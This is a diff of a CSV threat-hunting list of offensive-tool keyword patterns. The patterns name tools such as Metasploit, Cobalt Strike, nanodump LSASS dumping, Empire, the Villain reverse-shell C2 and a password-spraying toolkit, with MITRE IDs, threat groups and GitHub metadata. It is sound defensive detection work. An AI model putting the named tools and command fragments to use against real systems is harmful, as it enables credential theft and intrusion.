+"*source/dllinject*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. 
and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*source/flash_exploiter*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*source/javapayload*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*source/psh_exe*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. 
and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" "*source/shtinkering.*","offensive_tool_keyword","nanodump","The swiss army knife of LSASS dumping. A flexible tool that creates a minidump of the LSASS process.","T1003.001 - T1003.003","TA0006","N/A","N/A","Credential Access","https://github.com/fortra/nanodump","1","1","N/A","N/A","10","1467","208","2023-09-04T01:25:27Z","2021-11-10T18:28:15Z" "*Source\wdextract\*","offensive_tool_keyword","WDExtract","Extract Windows Defender database from vdm files and unpack it","T1059 - T1005 - T1119","TA0002 - TA0009 - TA0003","N/A","N/A","Defense Evasion","https://github.com/hfiref0x/WDExtract/","1","0","N/A","8","4","347","56","2020-02-10T06:53:43Z","2019-04-19T17:33:48Z" "*Source\wdextract\zlib\dll_x64\zlibwapi.dll*","offensive_tool_keyword","WDExtract","Extract Windows Defender database from vdm files and unpack it","T1059 - T1005 - T1119","TA0002 - TA0009 - TA0003","N/A","N/A","Defense Evasion","https://github.com/hfiref0x/WDExtract/","1","0","N/A","8","4","347","56","2020-02-10T06:53:43Z","2019-04-19T17:33:48Z" 
@@ -17121,7 +17304,7 @@
 "*source-teamserver.sh*","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","1","N/A","10","10","N/A","N/A","N/A","N/A"
 "*spacerunner.exe -i *.ps1* -o *.exe*","offensive_tool_keyword","SpaceRunner","enables the compilation of a C# program that will execute arbitrary PowerShell code without launching PowerShell processes through the use of runspace.","T1059.001 - T1027","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/Mr-B0b/SpaceRunner","1","0","N/A","7","2","185","38","2020-07-26T10:39:53Z","2020-07-26T09:31:09Z"
 "*SpaceRunner-master.zip*","offensive_tool_keyword","SpaceRunner","enables the compilation of a C# program that will execute arbitrary PowerShell code without launching PowerShell processes through the use of runspace.","T1059.001 - T1027","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/Mr-B0b/SpaceRunner","1","1","N/A","7","2","185","38","2020-07-26T10:39:53Z","2020-07-26T09:31:09Z"
-"*SpamChannel-main.zip*","offensive_tool_keyword","SpamChannel","poof emails from any of the +2 Million domains using MailChannels","T1566 - T1566.001","TA0011","N/A","N/A","Sniffing & Spoofing","https://github.com/byt3bl33d3r/SpamChannel","1","1","N/A","8","3","256","28","2023-09-21T12:25:03Z","2022-12-20T21:31:55Z"
+"*SpamChannel-main.zip*","offensive_tool_keyword","SpamChannel","poof emails from any of the +2 Million domains using MailChannels","T1566 - T1566.001","TA0011","N/A","N/A","Sniffing & Spoofing","https://github.com/byt3bl33d3r/SpamChannel","1","1","N/A","8","3","257","28","2023-09-21T12:25:03Z","2022-12-20T21:31:55Z"
 "*Spartacus.exe --mode proxy*","offensive_tool_keyword","Spartacus","Spartacus DLL/COM Hijacking Toolkit","T1574.001 - T1055.001 - T1027.002","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/Accenture/Spartacus","1","0","N/A","10","9","826","104","2023-09-02T00:48:42Z","2022-10-28T09:00:35Z"
 "*Spartacus-main.zip*","offensive_tool_keyword","Spartacus","Spartacus DLL/COM Hijacking Toolkit","T1574.001 - T1055.001 - T1027.002","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/Accenture/Spartacus","1","1","N/A","10","9","826","104","2023-09-02T00:48:42Z","2022-10-28T09:00:35Z"
 "*spartacus-proxy-*.log*","offensive_tool_keyword","Spartacus","Spartacus DLL/COM Hijacking Toolkit","T1574.001 - T1055.001 - T1027.002","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/Accenture/Spartacus","1","0","N/A","10","9","826","104","2023-09-02T00:48:42Z","2022-10-28T09:00:35Z"
@@ -17134,7 +17317,7 @@
 "*SpawnAsAgentManager.cs*","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","1","N/A","10","10","334","84","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z"
 "*spawnasshellcode*","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","1","N/A","10","10","334","84","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z"
 "*SpawnAsShellcodeManager*","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","1","N/A","10","10","334","84","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z"
-"*SpawneRv6yTYhShell*","offensive_tool_keyword","Villain","Villain is a C2 framework that can handle multiple TCP socket & HoaxShell-based reverse shells. enhance their functionality with additional features (commands. utilities etc) and share them among connected sibling servers (Villain instances running on different machines).","T1021 - T1043 - T1055 - T1071 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/t3l3machus/Villain","1","1","N/A","10","10","3252","534","2023-08-08T06:24:24Z","2022-10-25T22:02:59Z"
+"*SpawneRv6yTYhShell*","offensive_tool_keyword","Villain","Villain is a C2 framework that can handle multiple TCP socket & HoaxShell-based reverse shells. enhance their functionality with additional features (commands. utilities etc) and share them among connected sibling servers (Villain instances running on different machines).","T1021 - T1043 - T1055 - T1071 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/t3l3machus/Villain","1","1","N/A","10","10","3255","534","2023-08-08T06:24:24Z","2022-10-25T22:02:59Z"
 "*SpawnPPIDAgentManager*","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","1","N/A","10","10","334","84","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z"
 "*SpawnShellcode.cs*","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","1","N/A","10","10","334","84","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z"
 "*SpawnShellcodeManager*","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","1","N/A","10","10","334","84","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z"
@@ -17155,11 +17338,11 @@
 "*-SpiderFoot-correlations.csv*","offensive_tool_keyword","spiderfoot","The OSINT Platform for Security Assessments","T1595 - T1595.002 - T1596 - T1591 - T1591.002","TA0043 ","N/A","N/A","Information Gathering","https://www.spiderfoot.net/","1","0","N/A","6","10","N/A","N/A","N/A","N/A"
 "*spiderfoot-master*","offensive_tool_keyword","spiderfoot","The OSINT Platform for Security Assessments","T1595 - T1595.002 - T1596 - T1591 - T1591.002","TA0043 ","N/A","N/A","Information Gathering","https://www.spiderfoot.net/","1","1","N/A","6","10","N/A","N/A","N/A","N/A"
 "*SpiderLabs/DoHC2*","offensive_tool_keyword","DoHC2","DoHC2 allows the ExternalC2 library from Ryan Hanson (https://github.com/ryhanson/ExternalC2) to be leveraged for command and control (C2) via DNS over HTTPS (DoH). This is built for the popular Adversary Simulation and Red Team Operations Software Cobalt Strike","T1090.004 - T1021.002 - T1071.001","TA0011 - TA0008","N/A","N/A","C2","https://github.com/SpiderLabs/DoHC2","1","1","N/A","10","10","432","99","2020-08-07T12:48:13Z","2018-10-23T19:40:23Z"
-"*SpiderLabs/Responder*","offensive_tool_keyword","responder","LLMNR. NBT-NS and MDNS poisoner","T1557.001 - T1171 - T1547.011","TA0011 - TA0005 - TA0003","N/A","N/A","Sniffing & Spoofing","https://github.com/SpiderLabs/Responder","1","1","N/A","N/A","10","4198","1633","2020-06-15T18:07:44Z","2012-10-24T14:35:12Z"
+"*SpiderLabs/Responder*","offensive_tool_keyword","responder","LLMNR. NBT-NS and MDNS poisoner","T1557.001 - T1171 - T1547.011","TA0011 - TA0005 - TA0003","N/A","N/A","Sniffing & Spoofing","https://github.com/SpiderLabs/Responder","1","1","N/A","N/A","10","4199","1633","2020-06-15T18:07:44Z","2012-10-24T14:35:12Z"
 "*spindrift.py *--target *","offensive_tool_keyword","SprayingToolkit","Scripts to make password spraying attacks against Lync/S4B. OWA & O365 a lot quicker. less painful and more efficient","T1110 - T1078 - T1133 - T1061","TA0001 - TA0002 - TA0003","N/A","N/A","Credential Access","https://github.com/byt3bl33d3r/SprayingToolkit","1","0","N/A","10","10","1352","268","2022-10-17T01:01:57Z","2018-09-13T09:52:11Z"
 "*spindrift.py --domain*","offensive_tool_keyword","SprayingToolkit","Scripts to make password spraying attacks against Lync/S4B. OWA & O365 a lot quicker. less painful and more efficient","T1110 - T1078 - T1133 - T1061","TA0001 - TA0002 - TA0003","N/A","N/A","Credential Access","https://github.com/byt3bl33d3r/SprayingToolkit","1","0","N/A","10","10","1352","268","2022-10-17T01:01:57Z","2018-09-13T09:52:11Z"
 "*sploitus.com/exploit?id=6C1081C5-7938-5E83-9079-719C1B071FB5*","offensive_tool_keyword","POC","Automated PoC exploitation of CVE-2021-44521","T1548 - T1190","TA0006 - TA0008","N/A","N/A","Exploitation tools","https://github.com/QHpix/CVE-2021-44521","1","1","N/A","N/A","1","9","2","2022-02-24T12:04:40Z","2022-02-24T11:07:34Z"
-"*splunk/upload_app_exec/*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z"
+"*splunk/upload_app_exec/*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z"
 "*splunk_whisperer.py*","offensive_tool_keyword","SplunkWhisperer2","Local privilege escalation or remote code execution through Splunk Universal Forwarder (UF) misconfigurations","T1068 - T1059.003 - T1071.001","TA0003 - TA0002 - TA0011","N/A","N/A","Lateral Movement - Privilege Escalation","https://github.com/cnotin/SplunkWhisperer2","1","1","N/A","9","3","239","53","2022-09-30T16:41:17Z","2019-02-24T18:05:51Z"
 "*splunk_whisperer-master*","offensive_tool_keyword","SplunkWhisperer2","Local privilege escalation or remote code execution through Splunk Universal Forwarder (UF) misconfigurations","T1068 - T1059.003 - T1071.001","TA0003 - TA0002 - TA0011","N/A","N/A","Lateral Movement - Privilege Escalation","https://github.com/cnotin/SplunkWhisperer2","1","1","N/A","9","3","239","53","2022-09-30T16:41:17Z","2019-02-24T18:05:51Z"
 "*SplunkWhisperer2-master*","offensive_tool_keyword","SplunkWhisperer2","Local privilege escalation or remote code execution through Splunk Universal Forwarder (UF) misconfigurations","T1068 - T1059.003 - T1071.001","TA0003 - TA0002 - TA0011","N/A","N/A","Lateral Movement - Privilege Escalation","https://github.com/cnotin/SplunkWhisperer2","1","1","N/A","9","3","239","53","2022-09-30T16:41:17Z","2019-02-24T18:05:51Z"
@@ -17168,20 +17351,20 @@ "*spoof_wani*","offensive_tool_keyword","C2_Server","C2 server to connect to a victim machine via reverse shell","T1090 - T1090.001 - T1071 - T1071.001","TA0011 ","N/A","N/A","C2","https://github.com/reveng007/C2_Server","1","0","N/A","10","10","31","17","2022-02-27T02:00:02Z","2021-03-05T12:35:45Z" "*spoof_wlan_creds*","offensive_tool_keyword","C2_Server","C2 server to connect to a victim machine via reverse shell","T1090 - T1090.001 - T1071 - T1071.001","TA0011 ","N/A","N/A","C2","https://github.com/reveng007/C2_Server","1","0","N/A","10","10","31","17","2022-02-27T02:00:02Z","2021-03-05T12:35:45Z" "*--spoof-callstack *","offensive_tool_keyword","nanodump","The swiss army knife of LSASS dumping. A flexible tool that creates a minidump of the LSASS process.","T1003.001 - T1003.003","TA0006","N/A","N/A","Credential Access","https://github.com/fortra/nanodump","1","0","N/A","N/A","10","1467","208","2023-09-04T01:25:27Z","2021-11-10T18:28:15Z" -"*SpooferHostsIgnore*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" -"*SpooferHostsReply*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" -"*SpooferIP*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","N/A","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" -"*SpooferIPsIgnore*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" -"*SpooferIPsReply*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" -"*SpooferLearningDelay*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" -"*SpooferLearningInterval*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
